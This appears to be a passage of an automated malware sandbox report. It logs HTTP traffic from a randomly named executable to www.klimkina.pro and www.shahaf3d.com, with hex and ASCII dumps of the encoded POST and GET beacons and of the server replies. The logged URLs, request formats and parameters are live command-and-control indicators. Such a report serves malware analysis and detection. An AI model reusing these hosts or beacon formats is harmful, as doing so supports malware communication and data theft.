                                                                            Data Raw: 74 46 31 74 6b 36 3d 56 38 45 58 6f 32 66 38 74 5a 31 79 76 75 46 70 42 35 38 65 61 6b 4a 38 31 59 69 52 4e 56 63 30 4c 77 4f 66 6e 58 4c 76 79 6d 45 42 37 4c 53 68 74 59 6f 55 75 50 2f 53 35 61 57 79 64 75 41 6d 62 30 69 76 42 44 69 72 69 33 7a 66 55 6c 35 58 50 6d 77 30 75 52 72 69 75 4e 56 59 79 69 43 53 73 50 47 5a 57 6c 59 32 56 55 30 4f 76 70 4b 71 55 42 70 75 58 48 63 69 59 30 64 37 70 6b 38 65 32 62 30 5a 43 71 2f 35 52 72 76 38 78 50 67 57 65 2b 30 45 42 45 4a 79 74 2f 52 69 68 6b 44 69 71 69 77 78 38 4b 66 5a 6e 30 68 62 30 4e 4d 36 30 4d 43 49 64 4d 43 6d 45 46 45 4f 7a 75 37 6c 66 61 58 38 45 4a 4a 63 52 6b 75 31 49 6c 4a 71 34 32 6e 2b 50 54 58 71 6b 56 6f 59 63 33 53 70 43 45 42 33 64 54 41 70 45 61 77 54 6e 64 48 47 54 59 74 2f 68 68 34 77 74 7a 5a 48 79 67 4c 77 66 53 6d 30 52 64 4b 4e 31 77 6e 45 72 38 4d 68 2f 71 44 78 70 6e 64 68 37 38 4c 4b 4e 38 2b 30 4c 39 66 58 30 38 76 33 4d 74 44 49 32 42 32 74 32 75 4e 30 71 71 47 4f 50 6d 4f 6d 33 45 4f 35 69 44 78 2f 43 4e 75 79 76 67 62 [TRUNCATED]
                                                                            Data Ascii: tF1tk6=V8EXo2f8tZ1yvuFpB58eakJ81YiRNVc0LwOfnXLvymEB7LShtYoUuP/S5aWyduAmb0ivBDiri3zfUl5XPmw0uRriuNVYyiCSsPGZWlY2VU0OvpKqUBpuXHciY0d7pk8e2b0ZCq/5Rrv8xPgWe+0EBEJyt/RihkDiqiwx8KfZn0hb0NM60MCIdMCmEFEOzu7lfaX8EJJcRku1IlJq42n+PTXqkVoYc3SpCEB3dTApEawTndHGTYt/hh4wtzZHygLwfSm0RdKN1wnEr8Mh/qDxpndh78LKN8+0L9fX08v3MtDI2B2t2uN0qqGOPmOm3EO5iDx/CNuyvgbCYGBzsCZksr30s/23ib/xolVTEw+UdcomTht+SRuUsgYGTpgvn//FmnPqHHgT3AwDqHUtQjqfLHz6cW/SmzZ1+ZbjG5nF6PeIBvAwi1XoQFjnQ6vOje8aQpOyaiMH4H9FuGH7y5c8DpHqRmJ6DyYOKaIq0kUqttglokxH81kTAIKg/IEPdQ4AunbQiXy4dl94fpBh/7gUDTc7/TSSRszUX5RWoWedCRDqZygkHwTTDNvhzT7JZ4JtUnuPNIuUnpNT1FTERwHdzbpZ6aVttMX10m0TCj+X7eF3BW6DbJu8rb1U0502glc0zBzU2kmLAThPO6yvoOAgWeGVWJdKJYNAV39U9H7C+Xrv6uMIhIosX4B/NQIRRd+sql5hJD84rcxlaVmhSs5PAENS7g5OilAjXDhIcUM9extzLx91A9bVXgnu+LZAH+vGobQ5DrSNSapDe4tWzsZHjFp1MyAs1YXY/EqU/sJosrqWzu4HvzrCFtwhszQ5HXpEs+aE1f1WoCfQ9w3+umaNZyLAFksM+pf6mT45XKE/Q7ki6jEB5K7siS0VLhA6U0JphUF/4VHRddD+10Jzunli4WuNGhbb3EQCWUAZOxHayn11ZvfIS7GJf0ZmTh2cTpIclKy/xwsRCpJowK1/0NCmULUuElTmeoQRgVNw5Nn0RznS8 [TRUNCATED]
                                                                            Jun 19, 2024 22:39:23.335171938 CEST1236INHTTP/1.1 404 Not Found
                                                                            Server: nginx/1.18.0
                                                                            Date: Wed, 19 Jun 2024 20:39:23 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Set-Cookie: PHPSESSID5=1dc14ae36478ab420e0742cd783d1fc2; expires=Sat, 20-Jul-2024 20:39:23 GMT; Max-Age=2678400; path=/;Priority=High; domain=www.klimkina.pro; HttpOnly
                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                            Pragma: no-cache
                                                                            Set-Cookie: dd_bdfhyr=97fbb4a1cb202a920db1824b75ad049b; expires=Thu, 20-Jun-2024 20:39:23 GMT; Max-Age=86400; path=/; secure; HttpOnly
                                                                            Server-version: 38
                                                                            Content-Encoding: gzip
                                                                            Data Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 04 03 a5 57 dd 6e db 36 14 be b6 9f e2 54 bb e8 06 94 52 12 a7 45 7e 64 03 6b 9b 6d 1d 3a 6c d8 ba 8b a1 28 06 5a a2 2c c6 14 a9 8a 94 1d 0f bb 58 5b 6c d8 86 01 03 76 bf 8b be 41 3a 34 dd da b5 d9 2b 48 6f b4 43 4a 4e dc c4 69 ba cc 80 2d 91 3c e7 f0 e3 e1 c7 ef d0 61 cc 27 a0 cd 4c b0 be 97 d3 38 e6 72 44 8c ca b7 60 7d 25 df f3 06 dd 6e 18 a0 05 3e bb e1 a5 9b 9f de b8 f3 d5 67 3b 90 9a 4c 0c ba a1 7d 80 a0 72 d4 f7 98 44 d3 30 65 34 1e 74 01 3f 61 c6 0c 45 3b 93 13 76 bf e4 93 be 77 43 49 c3 a4 21 77 66 39 f3 20 6a 5a 7d cf b0 3d 13 d8 40 db 10 a5 b4 d0 cc f4 4b 93 90 0d 0f 82 41 b7 13 1a 6e 04 1b 7c c8 cc 0d 55 e2 20 10 d8 29 0a 55 c0 4d 96 d0 52 98 30 68 0c d0 d2 4d 28 69 86 cb 98 70 36 cd 55 61 16 a6 99 f2 d8 a4 fd 98 4d 78 c4 88 6b 5c 01 2e b9 e1 54 10 1d 51 5c fc aa bf 62 57 db 09 2f 11 02 b7 15 b5 89 80 eb 4a 19 6d 0a 9a 03 21 16 8e e0 72 0c 69 c1 92 be 17 e4 e5 50 f0 28 48 04 35 a4 e4 c1 70 6e 1a 44 5a 1f b7 7c 6c 79 50 30 d1 f7 5c 92 75 ca 98 39 3d [TRUNCATED]
                                                                            Data Ascii: 54eWn6TRE~dkm:l(Z,X[lvA:4+HoCJNi-<a'L8rD`}%n>g;L}rD0e4t?aE;vwCI!wf9 jZ}=@KAn|U )UMR0hM(ip6UaMxk\.TQ\bW/Jm!riP(H5pnDZ|lyP0\u9=u46x;Y'W0L4MYs,EnTbxg/8w Cnw;:Hven7T,CiIYp|&ckp6<a0"lt]|L]1\<z.b=KyOy'i_:Se{d~o8C8<X!rIxCa{q8,:Z9
                                                                            Jun 19, 2024 22:39:23.335378885 CEST766INData Raw: 11 ee 16 ee 91 0b 22 55 91 e1 19 6d 95 e9 38 52 ab 58 31 d7 39 ae 6c 0b 86 42 45 e3 6d 00 67 d1 09 d3 de 5c d3 8e 2c b8 c4 d3 cb 48 6b d8 06 dc 82 1e ca 9c d3 ba 6d 18 aa 22 66 c5 16 6c 60 8f 56 82 c7 f0 4e 6f 7d 7d f3 ea 8e 37 a8 7e ab 0e ab 3f
                                                                            Data Ascii: "Um8RX19lBEmg\,Hkm"fl`VNo}}7~?W_jGl<>cBzv:k8%\&}~8K8|P?@|Uy:o>^39sp-N;?!{0I9tg?GerI


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            8192.168.2.449752185.137.235.193805740C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 19, 2024 22:39:24.826581001 CEST431OUTGET /4mpz/?tF1tk6=Y+s3rA3a2LtNoPwXEph1agZvu5GuOlYPKC2uuWvM7lg96Y/Bosg4gpfl0qSHVI44Bh+XBT77oF2RMn9kUx4Voi3TiJN+9DCYn4mYX0I3YWd5veeVZiJYYCE=&8FiTp=kJrtnVsPEnF0JV HTTP/1.1
                                                                            Host: www.klimkina.pro
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Connection: close
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko
                                                                            Jun 19, 2024 22:39:25.576443911 CEST392INHTTP/1.1 301 Moved Permanently
                                                                            Server: nginx/1.18.0
                                                                            Date: Wed, 19 Jun 2024 20:39:25 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Location: http://klimkina.pro/4mpz/?tF1tk6=Y+s3rA3a2LtNoPwXEph1agZvu5GuOlYPKC2uuWvM7lg96Y/Bosg4gpfl0qSHVI44Bh+XBT77oF2RMn9kUx4Voi3TiJN+9DCYn4mYX0I3YWd5veeVZiJYYCE=&8FiTp=kJrtnVsPEnF0JV
                                                                            X-XSS-Protection: 1
                                                                            Data Raw: 30 0d 0a 0d 0a
                                                                            Data Ascii: 0


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            9192.168.2.44975364.46.118.35805740C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 19, 2024 22:39:30.874202967 CEST690OUTPOST /0a9p/ HTTP/1.1
                                                                            Host: www.shahaf3d.com
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Connection: close
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: no-cache
                                                                            Content-Length: 203
                                                                            Origin: http://www.shahaf3d.com
                                                                            Referer: http://www.shahaf3d.com/0a9p/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko
                                                                            Data Raw: 74 46 31 74 6b 36 3d 59 2b 4d 6f 43 6a 71 46 6b 66 56 70 69 33 49 78 4a 46 63 35 4a 2b 50 69 48 4c 55 76 69 30 73 30 4d 31 47 59 6e 37 2f 2f 50 44 4c 41 35 70 30 76 73 6a 48 6b 55 46 6d 6c 6f 74 63 47 36 4f 51 46 30 42 61 56 68 63 6e 71 4b 45 51 61 41 38 61 4f 67 46 2b 2b 56 41 34 44 2f 38 30 4e 43 56 37 42 43 57 6b 74 6c 45 4d 4b 70 6a 50 4e 33 36 6c 71 35 42 2f 31 6e 74 64 59 30 5a 6b 56 63 48 78 78 30 6f 42 4f 55 33 63 38 64 65 70 36 66 74 57 38 4e 34 6c 33 31 77 4e 50 58 38 77 44 5a 53 66 38 54 70 6b 6c 4c 62 54 31 54 52 50 62 39 43 59 35 5a 33 58 37 65 61 48 49 43 5a 53 77 48 64 66 76 45 51 3d 3d
                                                                            Data Ascii: tF1tk6=Y+MoCjqFkfVpi3IxJFc5J+PiHLUvi0s0M1GYn7//PDLA5p0vsjHkUFmlotcG6OQF0BaVhcnqKEQaA8aOgF++VA4D/80NCV7BCWktlEMKpjPN36lq5B/1ntdY0ZkVcHxx0oBOU3c8dep6ftW8N4l31wNPX8wDZSf8TpklLbT1TRPb9CY5Z3X7eaHICZSwHdfvEQ==
                                                                            Jun 19, 2024 22:39:32.109441996 CEST1236INHTTP/1.1 404 Not Found
                                                                            Connection: close
                                                                            x-powered-by: PHP/7.4.33
                                                                            x-litespeed-tag: afb_HTTP.404
                                                                            content-type: text/html; charset=UTF-8
                                                                            expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                            cache-control: no-cache; private
                                                                            x-litespeed-cache-control: no-cache
                                                                            transfer-encoding: chunked
                                                                            content-encoding: br
                                                                            vary: Accept-Encoding
                                                                            date: Wed, 19 Jun 2024 20:39:32 GMT
                                                                            server: LiteSpeed
                                                                            Data Raw: 63 33 34 0d 0a 80 90 02 80 f8 9f aa f6 df 73 c6 45 7f 56 0e 94 f6 11 0c 92 9c 28 51 de 18 bc 29 7a 21 e2 4a 84 17 04 f0 00 50 e1 6b 34 f3 8b fe 17 45 f7 ef 5d eb 15 b2 42 d9 0a 9f 64 22 f6 ee 13 e2 64 92 a3 bd fd 44 d8 56 31 3d 5f a5 00 50 c8 1a d9 1a 5b a1 fa 18 d3 fb da 49 39 8a 08 d4 ca 66 62 04 5c 64 76 10 1d 44 d3 26 b4 6a 00 ab 37 aa 7a a4 d9 a7 0f bd d9 41 04 00 7b 88 e3 df ec ba c1 2d 85 83 e6 2f f5 14 aa de 96 e0 e9 34 35 34 6f a9 ea 89 90 5f 8f 48 d8 b6 7a 40 45 50 a7 04 9b 7f 6f cc 7c cd 15 55 45 8f 28 37 26 b0 41 fb da 1f 1e bf 05 63 b3 76 7c d8 87 67 f7 9f dd 7f 82 d1 a3 1d 9a 29 98 0d 58 fc 7d 1e 1a 5d 3b 0a 84 d1 23 5c 3b a9 83 d4 4b 3c e9 94 da e2 b9 0e b4 74 3c 90 c0 7b 33 37 41 d6 f8 b0 f5 81 5a df cb 66 07 23 52 4d 34 4b a0 c9 59 18 07 85 71 de 04 4b 63 96 8a ac ea 3c 89 2c 9d 5a c3 ec 1b d3 22 c9 e7 f0 35 99 fe 2c 16 34 68 06 77 4e 81 ff 26 35 21 58 5f 66 99 6f 78 c3 17 23 91 d6 a6 25 d0 26 b4 3c b8 59 4c 6f 7a c8 62 a2 5c 49 74 d9 d9 da 32 a0 d7 cd 3a ab 0c 17 3e 1b e6 c3 51 96 [TRUNCATED]
                                                                            Data Ascii: c34sEV(Q)z!JPk4E]Bd"dDV1=_P[I9fb\dvD&j7zA{-/454o_Hz@EPo|UE(7&Acv|g)X}];#\;K<t<{37AZf#RM4KYqKc<,Z"5,4hwN&5!X_fox#%&<YLozb\It2:>Q_-f#2f+saa-C WSB4;k[79I$re&*hy%_h'zaV{`SLEBO"6;IsioJfTg H:/2X((oq&oZNbb]:,[+<j&?'Uk"38<Oy~wsOR<H{6!YIYg4U`n6v!ExI0=b'$6C@;'F/cOQGC~,a&k&(iIs4gL{N9vukYyuh1F]T/YiWVdV9O4^'\@)l9rzd$&~0bv84@nMD5%5fE/
                                                                            Jun 19, 2024 22:39:32.109575987 CEST1236INData Raw: f7 4b e3 4e ce 23 a1 f4 b0 ce ce ea 4d 2d b9 62 4a fa 90 36 99 e0 5c 1c 1d 2c 84 5b 03 61 9f 95 8d 59 91 13 69 05 0e f0 00 bf 5e ce fe a9 94 2c b5 09 fd 52 71 1f 98 59 b0 b0 b5 34 28 cb 31 47 eb 1a 9a 47 85 44 89 b8 1c cc 36 f4 3c 53 60 b1 b3 e3
                                                                            Data Ascii: KN#M-bJ6\,[aYi^,RqY4(1GGD6<S`/"=@QMSJr_KlkNdSiM`, iT_2_ZQo_(<?R;{/1@DQ2)][6m!D4dk1j#oZ%<?NjnCp6bIe1B.Y^8
                                                                            Jun 19, 2024 22:39:32.109616041 CEST1041INData Raw: ae 67 79 c3 5b c2 9d aa 42 3c e3 29 b3 4e 7b ab b8 6f 62 08 92 6a fe 75 ae 57 d2 87 94 0b d1 8f 55 d7 47 16 0c 9c 9d af b9 11 db 6c 76 7b 8e c9 17 98 88 b4 b2 39 6b 1f 85 a8 aa 4b 0f 7d 16 b6 4e b9 f5 d9 12 c3 4a d9 4a 0a d9 c6 98 1f fd d6 5f ad
                                                                            Data Ascii: gy[B<)N{objuWUGlv{9kK}NJJ_"a/|:+]'emMtNYhj?of_fv#abd:lwu$uaZ*|8S@D6wJ(yi@DpA2>n#ug(pU8{VBB
                                                                            Jun 19, 2024 22:39:32.110479116 CEST11INData Raw: 31 0d 0a 03 0d 0a 30 0d 0a 0d 0a
                                                                            Data Ascii: 10


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            10192.168.2.44975464.46.118.35805740C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 19, 2024 22:39:33.405536890 CEST710OUTPOST /0a9p/ HTTP/1.1
                                                                            Host: www.shahaf3d.com
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Connection: close
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: no-cache
                                                                            Content-Length: 223
                                                                            Origin: http://www.shahaf3d.com
                                                                            Referer: http://www.shahaf3d.com/0a9p/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko
                                                                            Data Raw: 74 46 31 74 6b 36 3d 59 2b 4d 6f 43 6a 71 46 6b 66 56 70 77 47 34 78 4f 69 6f 35 49 65 50 74 62 37 55 76 6f 55 73 77 4d 31 4b 59 6e 36 37 4a 50 78 76 41 35 4a 45 76 74 69 48 6b 58 46 6d 6c 6e 4e 63 44 6b 2b 51 4f 30 41 6d 64 68 5a 6e 71 4b 45 45 61 41 2b 79 4f 67 53 4b 39 56 51 34 42 33 63 30 50 4d 31 37 42 43 57 6b 74 6c 45 49 6b 70 6a 33 4e 33 4c 56 71 6f 51 2f 79 72 4e 64 66 7a 5a 6b 56 4e 58 78 31 30 6f 42 38 55 32 51 57 64 61 5a 36 66 73 6d 38 4d 70 6c 77 2b 77 4e 4a 59 63 78 54 49 48 71 50 5a 61 31 72 41 59 33 58 55 51 6e 50 38 45 4a 6a 49 47 32 73 4d 61 6a 37 66 65 62 45 4b 65 69 6d 66 59 36 72 49 70 59 6b 39 44 6e 68 4f 78 4f 58 50 4b 6b 64 6d 78 67 3d
                                                                            Data Ascii: tF1tk6=Y+MoCjqFkfVpwG4xOio5IePtb7UvoUswM1KYn67JPxvA5JEvtiHkXFmlnNcDk+QO0AmdhZnqKEEaA+yOgSK9VQ4B3c0PM17BCWktlEIkpj3N3LVqoQ/yrNdfzZkVNXx10oB8U2QWdaZ6fsm8Mplw+wNJYcxTIHqPZa1rAY3XUQnP8EJjIG2sMaj7febEKeimfY6rIpYk9DnhOxOXPKkdmxg=
                                                                            Jun 19, 2024 22:39:34.666969061 CEST1236INHTTP/1.1 404 Not Found
                                                                            Connection: close
                                                                            x-powered-by: PHP/7.4.33
                                                                            x-litespeed-tag: afb_HTTP.404
                                                                            content-type: text/html; charset=UTF-8
                                                                            expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                            cache-control: no-cache; private
                                                                            x-litespeed-cache-control: no-cache
                                                                            transfer-encoding: chunked
                                                                            content-encoding: br
                                                                            vary: Accept-Encoding
                                                                            date: Wed, 19 Jun 2024 20:39:34 GMT
                                                                            server: LiteSpeed
                                                                            Data Raw: 63 33 34 0d 0a 80 90 02 80 f8 9f aa f6 df 73 c6 45 7f 56 0e 94 f6 11 0c 92 9c 28 51 de 18 bc 29 7a 21 e2 4a 84 17 04 f0 00 50 e1 6b 34 f3 8b fe 17 45 f7 ef 5d eb 15 b2 42 d9 0a 9f 64 22 f6 ee 13 e2 64 92 a3 bd fd 44 d8 56 31 3d 5f a5 00 50 c8 1a d9 1a 5b a1 fa 18 d3 fb da 49 39 8a 08 d4 ca 66 62 04 5c 64 76 10 1d 44 d3 26 b4 6a 00 ab 37 aa 7a a4 d9 a7 0f bd d9 41 04 00 7b 88 e3 df ec ba c1 2d 85 83 e6 2f f5 14 aa de 96 e0 e9 34 35 34 6f a9 ea 89 90 5f 8f 48 d8 b6 7a 40 45 50 a7 04 9b 7f 6f cc 7c cd 15 55 45 8f 28 37 26 b0 41 fb da 1f 1e bf 05 63 b3 76 7c d8 87 67 f7 9f dd 7f 82 d1 a3 1d 9a 29 98 0d 58 fc 7d 1e 1a 5d 3b 0a 84 d1 23 5c 3b a9 83 d4 4b 3c e9 94 da e2 b9 0e b4 74 3c 90 c0 7b 33 37 41 d6 f8 b0 f5 81 5a df cb 66 07 23 52 4d 34 4b a0 c9 59 18 07 85 71 de 04 4b 63 96 8a ac ea 3c 89 2c 9d 5a c3 ec 1b d3 22 c9 e7 f0 35 99 fe 2c 16 34 68 06 77 4e 81 ff 26 35 21 58 5f 66 99 6f 78 c3 17 23 91 d6 a6 25 d0 26 b4 3c b8 59 4c 6f 7a c8 62 a2 5c 49 74 d9 d9 da 32 a0 d7 cd 3a ab 0c 17 3e 1b e6 c3 51 96 [TRUNCATED]
                                                                            Data Ascii: c34sEV(Q)z!JPk4E]Bd"dDV1=_P[I9fb\dvD&j7zA{-/454o_Hz@EPo|UE(7&Acv|g)X}];#\;K<t<{37AZf#RM4KYqKc<,Z"5,4hwN&5!X_fox#%&<YLozb\It2:>Q_-f#2f+saa-C WSB4;k[79I$re&*hy%_h'zaV{`SLEBO"6;IsioJfTg H:/2X((oq&oZNbb]:,[+<j&?'Uk"38<Oy~wsOR<H{6!YIYg4U`n6v!ExI0=b'$6C@;'F/cOQGC~,a&k&(iIs4gL{N9vukYyuh1F]T/YiWVdV9O4^'\@)l9rzd$&~0bv84@nMD5%5fE/
                                                                            Jun 19, 2024 22:39:34.667021036 CEST224INData Raw: f7 4b e3 4e ce 23 a1 f4 b0 ce ce ea 4d 2d b9 62 4a fa 90 36 99 e0 5c 1c 1d 2c 84 5b 03 61 9f 95 8d 59 91 13 69 05 0e f0 00 bf 5e ce fe a9 94 2c b5 09 fd 52 71 1f 98 59 b0 b0 b5 34 28 cb 31 47 eb 1a 9a 47 85 44 89 b8 1c cc 36 f4 3c 53 60 b1 b3 e3
                                                                            Data Ascii: KN#M-bJ6\,[aYi^,RqY4(1GGD6<S`/"=@QMSJr_KlkNdSiM`, iT_2_ZQo_(<?R;{/1@DQ2)][6m!D4dk1j#oZ%<?NjnCp
                                                                            Jun 19, 2024 22:39:34.667041063 CEST1236INData Raw: 36 e7 62 49 d8 8d d9 65 31 b4 d1 e4 16 42 2e 59 5e 38 b9 ea e1 09 f0 9b 1c 2e 85 75 6c 47 cd 31 d8 e9 d3 0b 72 6b 89 3b ae 6b 2a 91 c2 9a 68 20 fd 5c 41 b8 70 a2 c0 db 95 d7 01 42 66 20 3d 21 72 29 6d ac 74 24 58 91 d5 c1 34 03 ea 5e 79 41 f0 ee
                                                                            Data Ascii: 6bIe1B.Y^8.ulG1rk;k*h \ApBf =!r)mt$X4^yA.).:_dUe4"ba7drdI4F!Klro3HW5+ro.Z20Er|b,ey:F!b()&vGRX4,,2LYynX
                                                                            Jun 19, 2024 22:39:34.667077065 CEST817INData Raw: 87 b2 80 75 02 0a 67 28 70 55 38 7b 56 fc 42 89 98 b6 42 df 98 f5 35 e3 e8 30 47 ac 6b db 7e 96 c1 75 44 29 a5 1a 8d a6 26 82 c8 33 6b f4 77 4e 76 17 1f 2c 2f 66 a2 b9 d1 76 94 d8 e6 e3 ad b8 03 bf e5 9b 2f f6 93 53 92 49 36 2a 62 34 7d 56 76 ee
                                                                            Data Ascii: ug(pU8{VBB50Gk~uD)&3kwNv,/fv/SI6*b4}VvI0~7ml<v(~zh~>D5?c&,b<|DV_B<K8Csr`FQLi#xVq V*P+1$l [Tv9YM!45_f:vD|
                                                                            Jun 19, 2024 22:39:34.670361996 CEST11INData Raw: 31 0d 0a 03 0d 0a 30 0d 0a 0d 0a
                                                                            Data Ascii: 10


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            11192.168.2.44975564.46.118.35805740C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 19, 2024 22:39:35.936759949 CEST10792OUTPOST /0a9p/ HTTP/1.1
                                                                            Host: www.shahaf3d.com
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Connection: close
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: no-cache
                                                                            Content-Length: 10303
                                                                            Origin: http://www.shahaf3d.com
                                                                            Referer: http://www.shahaf3d.com/0a9p/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko
                                                                            Data Raw: 74 46 31 74 6b 36 3d 59 2b 4d 6f 43 6a 71 46 6b 66 56 70 77 47 34 78 4f 69 6f 35 49 65 50 74 62 37 55 76 6f 55 73 77 4d 31 4b 59 6e 36 37 4a 50 78 6e 41 35 36 4d 76 72 42 2f 6b 57 46 6d 6c 75 74 63 43 6b 2b 51 54 30 42 4f 5a 68 5a 6a 51 4b 48 38 61 41 66 53 4f 30 32 57 39 62 51 34 42 37 38 30 4d 43 56 37 51 43 57 31 6c 6c 45 34 6b 70 6a 33 4e 33 49 39 71 6f 42 2f 79 74 4e 64 59 30 5a 6c 61 63 48 77 67 30 6f 5a 73 55 32 55 73 64 70 52 36 63 4d 32 38 4c 62 39 77 69 67 4e 78 5a 63 77 57 49 48 75 51 5a 63 52 52 41 5a 54 74 55 54 37 50 38 69 49 59 63 46 65 31 4e 4c 33 42 4d 50 62 54 48 4d 62 6d 59 72 6d 79 4e 4a 56 6b 2b 53 2f 4e 55 77 2f 59 56 66 78 58 78 57 52 4f 76 33 43 45 2f 46 6e 38 74 35 6b 74 78 53 6d 68 72 48 67 35 41 4e 34 2b 7a 47 41 61 47 75 62 49 31 73 78 59 72 53 69 72 6a 78 6f 59 39 30 62 41 5a 65 66 74 33 57 52 6d 37 41 72 47 37 69 50 4e 4a 6e 6e 30 34 42 52 72 70 6a 45 57 68 4e 48 33 2f 5a 6c 77 6f 67 6f 71 48 5a 37 31 68 59 35 37 7a 6c 50 78 43 54 4d 34 73 47 51 30 74 59 67 4b 32 5a 31 [TRUNCATED]
                                                                            Data Ascii: tF1tk6=Y+MoCjqFkfVpwG4xOio5IePtb7UvoUswM1KYn67JPxnA56MvrB/kWFmlutcCk+QT0BOZhZjQKH8aAfSO02W9bQ4B780MCV7QCW1llE4kpj3N3I9qoB/ytNdY0ZlacHwg0oZsU2UsdpR6cM28Lb9wigNxZcwWIHuQZcRRAZTtUT7P8iIYcFe1NL3BMPbTHMbmYrmyNJVk+S/NUw/YVfxXxWROv3CE/Fn8t5ktxSmhrHg5AN4+zGAaGubI1sxYrSirjxoY90bAZeft3WRm7ArG7iPNJnn04BRrpjEWhNH3/ZlwogoqHZ71hY57zlPxCTM4sGQ0tYgK2Z1tjTJIeQjyFZfFXyPuiPufolRQG9AfzL605tWR5IjxSJJLbpXA0mpvQGdi4nlQmz8F6NS0TRcfZVHj4dtv/OIvZWfFH6h029JKBqduRVPkZTbX2IyFUgwOXfDDRFaBusScpF1tmfaV6BXJ5xsFZtn243z1MLiZt/JmPMv8KzyHAn+SdWdEZZaEfnZ3Y5tlTmw+NjY3UmQjTQLmTVI2SugKXwQeVsKUBcyuq9TCsh0E2LX+b1FneIrt1q3ezm+hsXn95R2qp3K4STjppDqVJRBXMuf5PF2dTK3HdRV89dW3yh8wPMMbaYt/V0ECXK+O+yY+WMYAlKOkZ978JtRakaVObVwfYBSi9l486ZF6UHUSGi5gDZKlRHlP7td3cPMJk8klIR+2Sj4emT7JBGhcE2o8a72taKNwP9goiy/okf22tycs0HfbQFdeBAzvFEMfetS5tfUYze2DQap4kGN8AuNezNYM5VCX4/9cI4sKLWPbxCjJR31sdpNNIBqX+O0TDRdffsPQOdaOv6IMucIqT5ZJvxmG9rdKLlGEhAykGghjmGdmCGB5ZphGpTB/YYMOwAJPNEdUvF/FSdj0QFFwCRLcdbAMoP+uUTnb6h4Zmruniej5wdN3Dnjyb43qo5d5d4rS2aGdYLs/lf5f7Sb8SFiipvhdYtQsERtjm [TRUNCATED]
                                                                            Jun 19, 2024 22:39:37.208005905 CEST1236INHTTP/1.1 404 Not Found
                                                                            Connection: close
                                                                            x-powered-by: PHP/7.4.33
                                                                            x-litespeed-tag: afb_HTTP.404
                                                                            content-type: text/html; charset=UTF-8
                                                                            expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                            cache-control: no-cache; private
                                                                            x-litespeed-cache-control: no-cache
                                                                            transfer-encoding: chunked
                                                                            content-encoding: br
                                                                            vary: Accept-Encoding
                                                                            date: Wed, 19 Jun 2024 20:39:37 GMT
                                                                            server: LiteSpeed
